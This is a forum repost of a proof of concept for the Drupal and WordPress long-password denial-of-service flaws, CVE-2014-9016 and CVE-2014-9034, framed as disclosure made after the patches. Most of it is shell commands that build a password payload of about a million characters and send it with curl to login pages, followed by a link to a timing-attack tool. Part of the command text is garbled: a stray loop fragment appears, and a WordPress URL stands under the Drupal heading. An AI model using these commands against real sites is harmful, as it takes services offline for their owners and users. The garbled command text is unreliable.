Nytro Posted December 1, 2014 Report Posted December 1, 2014 CVE-2014-9016 and CVE-2014-9034 Proof of ConceptAssuming that time enough has happened since the security update was released by Wordpress and Drupal, we want to share our researches. As you already know, we believe in Responsible Disclosure and that is the reason why we didn't publish this post before. [h=2]Drupal Denial of Service CVE-2014-9016[/h] Generate a pyaload and try with a non-valid user:$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &Generate a pyaload and try with a valid user:$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done[h=2]Python Code[/h] https://github.com/c0r3dump3d/wp_drupal_timing_attack[h=2]References[/h] Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleepDrupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleepTiming Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/consolehttps://wordpress.org/news/2014/11/wordpress-4-0-1/ https://www.drupal.org/SA-CORE-2014-006 https://www.drupal.org/node/2378367NVD - Detailhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016Sursa: CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep Quote
